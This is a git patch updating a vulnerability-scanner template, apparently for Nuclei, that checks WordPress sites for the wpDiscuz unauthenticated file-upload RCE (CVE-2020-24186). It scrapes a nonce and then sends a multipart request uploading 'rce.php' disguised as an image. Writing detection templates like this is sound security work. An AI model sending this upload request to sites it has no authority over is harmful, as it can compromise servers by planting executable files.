From 83fd749b4eeacab5523f3d1e42706ea5c853694e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 14 Mar 2021 19:47:36 +0530 Subject: [PATCH] template update --- cves/2020/CVE-2020-24186.yaml | 87 ++++++++++++++++++++++++----------- 1 file changed, 61 insertions(+), 26 deletions(-) diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index bf916c400a..1da1e88e32 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -1,54 +1,89 @@ id: CVE-2020-24186 info: - name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin + name: Unauthenticated File upload wpDiscuz WordPress plugin RCE author: Ganofins severity: high description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md - tags: cve,cve2020,wordpress,wp-plugin + tags: cve,cve2020,wordpress,wp-plugin,rce requests: - raw: - | - POST /wp-admin/admin-ajax.php HTTP/1.1 + GET /?p=1 HTTP/1.1 Host: {{Hostname}} - Content-Length: 774 Accept: */* - X-Requested-With: XMLHttpRequest - User-Agent: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Cookie: Connection: close - ------WebKitFormBoundaryUGWBOKSwsalnzhha + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Length: 745 + Accept: */* + X-Requested-With: XMLHttpRequest + sec-ch-ua-mobile: ?0 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak + Origin: {{BaseURL}} + Sec-Fetch-Site: same-origin + Sec-Fetch-Mode: cors + Sec-Fetch-Dest: empty + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" - + wmuUploadFiles - ------WebKitFormBoundaryUGWBOKSwsalnzhha + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmu_nonce" - - aede3ab0b2 - ------WebKitFormBoundaryUGWBOKSwsalnzhha + + {{wmuSecurity}} + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="wmuAttachmentsData" - + undefined - ------WebKitFormBoundaryUGWBOKSwsalnzhha - Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php" - Content-Type: image/jpeg - - ÿØÿájExifMM*���i��>����������¨����À�����������ÿà�JFIF����ÿÛC��� - �� + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" + Content-Type: image/png + + {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}} - ------WebKitFormBoundaryUGWBOKSwsalnzhha + ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="postId" + + 1 + ------WebKitFormBoundary88AhjLimsDMHU1Ak-- - 393 - ------WebKitFormBoundaryUGWBOKSwsalnzhha-- + extractors: + - type: regex + part: body + internal: true + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + - type: regex + part: body + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + + matchers-condition: and matchers: - type: status status: - 200 + + - type: word + words: + - 'success":true' + - 'fullname' + - 'shortname' + - 'url' + condition: and + part: body